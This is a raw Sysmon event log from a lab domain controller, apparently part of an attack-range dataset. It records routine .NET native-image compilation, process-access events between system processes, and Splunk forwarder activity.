EventID=11 (FileCreate) RecordID=20734 RuleName=DLL UtcTime=2021-06-23 21:04:24.134 ProcessGuid={4DB9351A-A1D7-60D3-B903-00000000CF01} ProcessId=5592 Image=C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe TargetFilename=C:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\15d8-0\Microsoft.Security.ApplicationId.PolicyManagement.PolicyManager.dll CreationUtcTime=2021-06-23 21:04:24.134

EventID=10 (ProcessAccess) RecordID=20733 RuleName=- UtcTime=2021-06-23 
21:04:23.993{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D7-60D3-B903-00000000CF01}5592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020786Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.775{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D9-60D3-C703-00000000CF01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020785Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:25.759{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D9-60D3-C703-00000000CF01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020784Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.759{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D9-60D3-C703-00000000CF01}5600C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000020783Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.650{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=E4B2435C1880DF9F60CB6DC31978A246,SHA256=5D7C8F5D43D2D836C4BAA1B921BCF1324354618171E40DB56D424788155DCDCB,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000020782Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.650{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D9-60D3-C603-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020781Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.618{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D9-60D3-C603-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020780Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:25.618{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D9-60D3-C603-00000000CF01}6660C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020779Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:25.587{4DB9351A-A1D9-60D3-C503-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\c0c-0\Microsoft.Tpm.Commands.dll2021-06-23 21:04:25.587 10341000x800000000000000020778Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:25.478{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D9-60D3-C503-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020777Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.462{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1D9-60D3-C503-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020776Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:25.462{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D9-60D3-C503-00000000CF01}3084C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020775Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:25.415{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D9-60D3-C403-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020774Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.384{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D9-60D3-C403-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020773Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:25.384{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D9-60D3-C403-00000000CF01}6372C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000020772Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:25.353{4DB9351A-A1D9-60D3-C303-00000000CF01}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\8c4-0\Microsoft.Storage.Vds.dll2021-06-23 21:04:25.353 354300x800000000000000020771Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:23.267{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61425-false10.0.1.12-8000- 10341000x800000000000000020770Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.025{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1D9-60D3-C303-00000000CF01}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020769Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:25.009{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1D9-60D3-C303-00000000CF01}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020768Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:25.009{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1D9-60D3-C303-00000000CF01}2244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000020800Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:26.837{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DA-60D3-CA03-00000000CF01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020799Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.806{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1DA-60D3-CA03-00000000CF01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020798Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
21:04:26.806{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1DA-60D3-CA03-00000000CF01}5328C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000020797Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.760{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0880C0B0C9D61552DC80E6C86C9CC724,SHA256=76C277288F29695DB42563AB4616A26FDB2FEE99AA11DEB7B2A6879BC370036B,IMPHASH=00000000000000000000000000000000falsetrue 
11241100x800000000000000020796Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:26.728{4DB9351A-A1DA-60D3-C903-00000000CF01}6768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1a70-0\Microsoft.Transactions.Bridge.Dtc.dll2021-06-23 21:04:26.728 10341000x800000000000000020795Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.571{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1DA-60D3-C903-00000000CF01}6768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000020794Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:26.556{4DB9351A-9DDB-60D3-0500-00000000CF01}412432C:\Windows\system32\csrss.exe{4DB9351A-A1DA-60D3-C903-00000000CF01}6768C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000020793Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 
